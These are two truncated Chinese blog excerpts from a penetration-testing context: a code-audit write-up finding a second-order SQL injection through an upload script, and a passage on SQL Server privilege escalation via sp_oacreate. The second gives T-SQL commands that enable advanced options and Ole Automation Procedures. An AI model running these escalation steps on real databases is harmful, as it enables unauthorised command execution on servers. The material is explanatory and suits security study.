2019年11月19日
先扫目录,得到源码代码审计此题入口点是二次注入。 在common.inc.php中可以看到全局进行了转义,这样常规注入少了大部分。遍观代码,输入处没有任何反转义、反解压、数字型等特殊情况,基本可以确定不存在直接的注入漏洞。 看到上传处的代码upload.php:<?php$name = basename($file["name"]);
$path_parts = pathinfo($name);if(!in_array($pat
2019年11月19日
使用sp_oacreate进行提权--提权语句--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1EXEC sp_configure 'show advanced options', 1; --使前面的配置生效RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIG